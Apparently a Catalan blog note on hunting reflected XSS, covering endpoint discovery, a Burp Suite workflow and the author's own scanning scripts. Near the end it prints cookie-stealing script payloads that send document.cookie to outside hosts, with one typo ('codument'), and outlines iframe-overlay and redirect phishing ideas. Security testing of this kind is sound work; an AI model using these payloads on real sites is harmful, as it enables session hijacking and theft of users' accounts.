BUG: Cross-Site Script (XSS)

Els end points poden pendre diverses formes, les més comunes:

• Formularis.
• Paràmetres a la URL (GET).
• Paràmetres en petició POST.

Alguns llocs típics:

• Formularis de contacte.
• Barres de cerca.
• Comentaris.
• Fòrums.
• Formularis de registre.
• Pàgines de login.

Un cop localitzar els end points cal veure com reaccionen al entrar una dada. Per fer-ho introduïrem un valor fàcilment reconeixible dins del codi de resposta que tornarà la web, per exemple podem introduïr el valor "hackingit".

Per finalitzar hem d'analitzar com retorna el valor entrat, en el cas anterior "hackingit", i per fer-ho analitzarem el codi font de la web de resposta ja que pot ser que el valor introduït no es visualitzi directament a la web però si que estigui contingut en el seu codi.

Un exemple de Reflected XSS que no apareix a la web però si al codi font i continua sent vulnerable el podem trobar aquí.

Un cop veiem quina estructura HTML conté el nostre valor introduït podrem estructurar un codi javascript per executar un atac XSS en aquest end point.

1. Activar el Proxy de Burp Suite.
2. Accedir a la web.
3. Afegir la web als targets.
4. Enviar el target a spider.
5. Ordenar resultats per columna paràmetres.
6. Per cara URL amb paràmetres, enviar-la a repeater per veure si es reflecteix i després a intruder substituïnt el paràmetre amb un fitxer d'exploits i a partir d'aquí analitzar les respostes, per el seu tamany per exemple.

• Github de XSStrike.

He desenvolupat varis scripts de Python, separats per poder-los reutilitzar i integrar amb interlace.

edFinder.py

Cercar paràmetres a les URLs, de forma que troba end points. Caldria que també trobés paràmetres al cos de la petició.

XSSreflected.py

Per cada paràmetre de cada URL envia una petició amb una "marca", posteriorment verifica si aquesta marca apareix al cos HTML de la resposta. D'aquesta forma es troben pàgines web candidates a ser vulnerables per XSS.

XSSFinder.py

Per cada URL amb paràmetre marcat (encadenant amb XSSreflected.py) prova un llistat de payload i verifica si en la resposta s'ha obert un popup. D'aquesta forma verifiquem si és realment vulnerable. Funciona correctament però és molt i molt lent.

Programa escrit amb GO que permet mitjançant un arxiu configurable, establir un seguit de programes a llançar i quines parts han de ser concurrents. D'aquesta forma permet automatitzar varies eines, per exemple llistar subdominis, després fer crawler, a partir d'aquí detectar end points, després llançar bateria de test de SQLi, XSS, etc. Aquí hi ha el projecte de GitHub.

<script>document.location.href="http://atacant.cat/?robatori="+codument.cookie</script>

<script>document.write('<img src="http://alquimiabinaria.cat/?cookie='+document.cookie+'" style="display: none;"/>')</script>

Exemple email DOM

prova 2
<script>
var url = "http://alquimiabinaria.cat/?galeta="+document.cookie;
var img = new Image();
img.src = url;
document.body.appendChild(img);</script>
...

Incloure un iframe amb 100% de tamany i d'aquesta manera substituïr la web original.

La idea és que dins l'enllaç legitim, en carregar la web, et redirigeix automàticament a una web atacant, que podría simular l'original.